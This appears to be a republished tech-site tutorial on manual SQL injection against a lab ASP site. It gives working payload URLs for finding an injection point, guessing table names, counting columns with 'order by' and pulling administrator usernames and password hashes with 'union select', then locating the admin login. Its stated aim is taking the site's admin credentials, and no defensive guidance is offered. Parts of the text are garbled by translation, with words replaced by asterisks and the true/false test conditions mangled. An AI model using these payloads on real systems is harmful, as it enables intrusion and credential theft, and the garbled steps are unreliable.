Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to achieve manual SQL injection. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

SQL injection is one of the common methods for * to * database. Its core idea is: * construct a database query code after the normal URL that calls database data, and then obtain some desired data according to the returned results. Next, we will inject SQL into the previously built * platform, and the ultimate goal is to obtain the administrator account and password of the website. Target server IP address: 192.168.80.129 director * host IP address: 192.168.80.128.

(1) find the injection point

Open any web page and pay attention to URL.

The injection point must be a page with command invocation such as "http://192.168.80.129/shownews.asp?id=7"". "shownews.asp?id=7" is the value passed on the page, that is, the "id=7" is passed to the "shownews.asp" page for processing.

We can add and 1 and and 1 to this URL for testing.

Http://192.168.80.129/shownews.asp?id=7 and 1: 1, the web page can still be displayed normally.

Http://192.168.80.129/shownews.asp?id=7 and 1 / 2, the web page does not display properly.

This means "asp?" We also call our own added "and 1 # 1" as a command parameter, so we can construct some SQL statements to be called for execution to get the required information, which is called an injection vulnerability. A web page like this that can invoke command parameters is called an injection point.

(2) guess the table name

The main purpose of * * building a website * * is to obtain the username and password of the webmaster, which are stored in a table in the background database, so first we have to guess what the name of the data table is.

Admin and admin_user are most commonly used in table names. We can guess the table name by adding such a statement after the injection point URL:

Http://192.168.80.129/shownews.asp?id=7 and (select count (*) from admin) > 0

"select count (*) from admin" means to count how many records there are in the admin table, and if the admin table exists, this statement gets a numeric value. Using this value to compare with > 0, the result must be valid, so the page should be displayed normally at this time. On the other hand, if the admin table does not exist, then "select count (*) from admin" will not get any value, compared with > 0, the result is not valid, the web page will not display properly.

If the web page does not display properly, you can try another table name until it is displayed properly:

Http://192.168.80.129/shownews.asp?id=7 and (select count (*) from admin_user) > 0

Http://192.168.80.129/shownews.asp?id=7 and (select count (*) from manage_user) > 0

The table name of this website is manage_user.

Common table names are: admin sysadmin manger admin123 webadmin member manage_user

Note: if you can't guess the name of the table, you can also use tools such as Ming Boy to help.

(3) guess the number of fields

The next step is to guess which field in the table holds the user name and password. You first need to know how many fields there are in the data table.

Here to use the "order by" statement, "order by" is meant to sort by a field, "order by 10" is sorted by the 10th field, if the 10th field exists, then the page will display normally, otherwise, if the page does not display properly, it indicates that the 10th field does not exist.

Http://192.168.80.129/shownews.asp?id=7 order by 11

In this way, we can guess that there are 11 fields in this table.

(4) guess the field name

The next step is to know which field holds the user name and password, and the "union select" federated query statement is used here.

Http://192.168.80.129/shownews.asp?id=7 union select 1,2,3,4,5,6,7,8,9,10,11 from manage_user

The fields where the user name and password are stored will be exposed.

The field in which the user name is stored is generally called username, and the field in which the password is stored is generally called password. Replace fields 2 and 3 with these two names:

Http://192.168.80.129/shownews.asp?id=7 union select 1,username,password,4,5,6,7,8,9,10,11 from manage_user

At this point, the user name and password are revealed.

(5) guess the background management entrance

In this 2.0 version of the Southern data template, there is an "administrator login" link. Now most websites will not be set up in this way, so it is generally based on experience to guess that the management entry is generally stored in the subdirectory of the network station named admin. Enter the address http://192.168.80.129/admin below and the management entry will be displayed automatically.

You can log in here with the administrator account and password revealed earlier, but the password "3acdbb255b45d296" is obviously encrypted by MD5.

The above is the editor for you to share how to achieve manual SQL injection, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.